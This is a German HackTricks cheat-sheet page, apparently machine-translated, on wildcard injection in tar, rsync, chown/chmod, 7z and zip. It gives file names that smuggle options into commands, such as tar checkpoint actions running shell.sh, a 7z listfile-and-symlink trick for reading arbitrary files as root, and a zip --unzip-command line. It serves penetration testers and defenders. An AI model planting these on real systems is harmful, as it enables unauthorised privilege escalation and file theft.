tip
Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Unterstützen Sie HackTricks
- Überprüfen Sie die Abonnementpläne!
- Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
- Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repos senden.
chown, chmod
Sie können angeben, welchen Dateibesitzer und welche Berechtigungen Sie für die restlichen Dateien kopieren möchten
touch "--reference=/my/own/path/filename"
Sie können dies mit https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (kombinierter Angriff) ausnutzen.
Weitere Informationen finden Sie unter https://www.exploit-db.com/papers/33930
Tar
Führen Sie beliebige Befehle aus:
touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"
Sie können dies mit https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (tar-Angriff) ausnutzen.
Weitere Informationen finden Sie unter https://www.exploit-db.com/papers/33930
Rsync
Führen Sie beliebige Befehle aus:
Interesting rsync option from manual:
-e, --rsh=COMMAND specify the remote shell to use
--rsync-path=PROGRAM specify the rsync to run on remote machine
touch "-e sh shell.sh"
Sie können dies ausnutzen, indem Sie https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (_rsync _attack)
Weitere Informationen finden Sie unter https://www.exploit-db.com/papers/33930
7z
In 7z können Sie selbst mit --
vor *
(beachten Sie, dass --
bedeutet, dass die folgenden Eingaben nicht als Parameter behandelt werden können, sondern in diesem Fall nur als Dateipfade) einen beliebigen Fehler verursachen, um eine Datei zu lesen. Wenn also ein Befehl wie der folgende von root ausgeführt wird:
7za a /backup/$filename.zip -t7z -snl -p$pass -- *
Und Sie können Dateien im Ordner erstellen, in dem dies ausgeführt wird. Sie könnten die Datei @root.txt
und die Datei root.txt
erstellen, die ein symlink zu der Datei ist, die Sie lesen möchten:
cd /path/to/7z/acting/folder
touch @root.txt
ln -s /file/you/want/to/read root.txt
Dann, wenn 7z ausgeführt wird, behandelt es root.txt
als eine Datei, die die Liste der Dateien enthält, die es komprimieren soll (das zeigt die Existenz von @root.txt
an), und wenn 7z root.txt
liest, wird es /file/you/want/to/read
lesen und da der Inhalt dieser Datei keine Liste von Dateien ist, wird es einen Fehler ausgeben, der den Inhalt zeigt.
Mehr Informationen in den Write-ups der Box CTF von HackTheBox.
Zip
Führen Sie beliebige Befehle aus:
zip name.zip files -T --unzip-command "sh -c whoami"
tip
Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Unterstützen Sie HackTricks
- Überprüfen Sie die Abonnementpläne!
- Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
- Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repos senden.